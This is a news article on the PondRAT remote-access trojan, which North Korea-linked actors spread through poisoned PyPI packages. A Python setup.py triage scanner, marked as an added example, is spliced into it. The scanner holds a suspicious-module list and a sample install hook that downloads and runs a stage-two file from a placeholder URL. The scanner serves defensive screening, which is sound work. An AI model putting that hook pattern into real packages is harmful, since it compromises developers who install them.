PondRAT Malware Hides in Python Packages

Lilu Anderson


Threat actors associated with North Korea have been observed using malicious Python packages to distribute a new malware variant known as PondRAT. This development appears to be a continuation of an existing campaign of cyberattacks that specifically targets software developers.

Understanding PondRAT and Its Origins

PondRAT is believed to be a lighter version of a previously identified malware called POOLRAT (also known as SIMPLESEA), a backdoor used in attacks against macOS systems. This malware is connected to the Lazarus Group, a well-known cybercriminal organization linked to the North Korean government. The Lazarus Group was previously involved in the 3CX supply chain attack last year.

Operation Dream Job Campaign

Some instances of PondRAT have been tied to a broader cyberattack campaign dubbed Operation Dream Job. This campaign lures potential targets with attractive job offers and tricks them into downloading malicious software.

Infiltration via Python Packages

According to cybersecurity researcher Yoav Zemah from Unit 42, attackers uploaded several tainted Python packages to PyPI, a popular repository for open-source Python software. This action is linked with moderate confidence to a threat actor identified as Gleaming Pisces. This entity is also known in the cybersecurity community as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736 – all sub-groups under the Lazarus Group known for distributing additional malware such as AppleJeus.

Malicious Packages and Infection Chain

The malicious packages, which have since been removed from PyPI, included:

  • real-ids (893 downloads)
  • coloredtxt (381 downloads)
  • beautifultext (736 downloads)
  • minisound (416 downloads)

Once these packages are downloaded and installed on a developer's system, they trigger a sequence that downloads the Linux and macOS versions of the remote access trojan (RAT) from a remote server. This simple infection chain capitalizes on the user's trust in the PyPI repository.
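Because the infection chain runs when the package is installed, one defensive check is to statically triage a package's setup.py before installing it. The following is an added example, not code from the article or from Unit 42; the module list, command list, helper names and the constructed sample setup.py (with a placeholder URL) are assumptions made here.

```python
"""Static triage of a setup.py for install-time code execution (added example, not from the article)."""
import ast

# Modules whose use inside setup.py warrants review (assumed list, not from the article).
SUSPICIOUS_MODULES = {"urllib", "requests", "socket", "subprocess", "os", "base64", "ctypes"}
# setuptools commands that run during `pip install`; overriding them is how install-time code is hooked.
HOOKABLE_COMMANDS = {"install", "develop", "egg_info", "build_py"}

# Constructed sample input resembling an install-time hook; the package name and URL are placeholders.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request, subprocess
class PostInstall(install):
    def run(self):
        urllib.request.urlopen("http://PLACEHOLDER.invalid/stage2")
        subprocess.Popen(["/tmp/stage2"])
setup(name="example-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

def _dotted_name(node):
    """Turn an Attribute/Name chain such as urllib.request.urlopen into a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage_setup_py(source: str) -> dict:
    """Walk the AST and collect hooked commands, risky imports and risky calls."""
    findings = {"cmdclass_overrides": [], "suspicious_imports": [], "suspicious_calls": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            findings["suspicious_imports"] += [a.name for a in node.names if a.name.split(".")[0] in SUSPICIOUS_MODULES]
        elif isinstance(node, ast.ImportFrom) and node.module and node.module.split(".")[0] in SUSPICIOUS_MODULES:
            findings["suspicious_imports"].append(node.module)
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass" and isinstance(node.value, ast.Dict):
            findings["cmdclass_overrides"] += [k.value for k in node.value.keys if isinstance(k, ast.Constant) and k.value in HOOKABLE_COMMANDS]
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name and name.split(".")[0] in SUSPICIOUS_MODULES:
                findings["suspicious_calls"].append(name)
    return findings

def is_suspicious(findings: dict) -> bool:
    """Flag when an install hook is combined with network or process activity."""
    return bool(findings["cmdclass_overrides"]) and bool(findings["suspicious_imports"] or findings["suspicious_calls"])
```

Run `triage_setup_py` on the setup.py extracted from an sdist (or on the sample above) and review any package where `is_suspicious` is true before it reaches a developer machine or build pipeline.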

Capabilities and Risks

Further analysis shows that PondRAT shares similarities with both POOLRAT and AppleJeus, suggesting that Gleaming Pisces is broadening its capabilities across Linux and macOS platforms. The malware's successful deployment can lead to a widespread network compromise.

Broader Implications for Businesses

The KnowBe4 security firm disclosed that they were deceived into hiring a North Korean threat actor. More than a dozen other companies reportedly hired North Korean individuals or were flooded with fraudulent resumes. This activity is characterized as a "complex, industrial, scaled nation-state operation" and highlights the risks for companies with remote-only employees.

In conclusion, businesses and developers are advised to remain vigilant against potential software supply chain threats and to scrutinize job applicants more closely to mitigate these emerging cybersecurity risks.

Lilu Anderson is a technology writer and analyst with over 12 years of experience in the tech industry. A graduate of Stanford University with a degree in Computer Science, Lilu specializes in emerging technologies, software development, and cybersecurity. Her work has been published in renowned tech publications such as Wired, TechCrunch, and Ars Technica. Lilu’s articles are known for their detailed research, clear articulation, and insightful analysis, making them valuable to readers seeking reliable and up-to-date information on technology trends. She actively stays abreast of the latest advancements and regularly participates in industry conferences and tech meetups. With a strong reputation for expertise, authoritativeness, and trustworthiness, Lilu Anderson continues to deliver high-quality content that helps readers understand and navigate the fast-paced world of technology.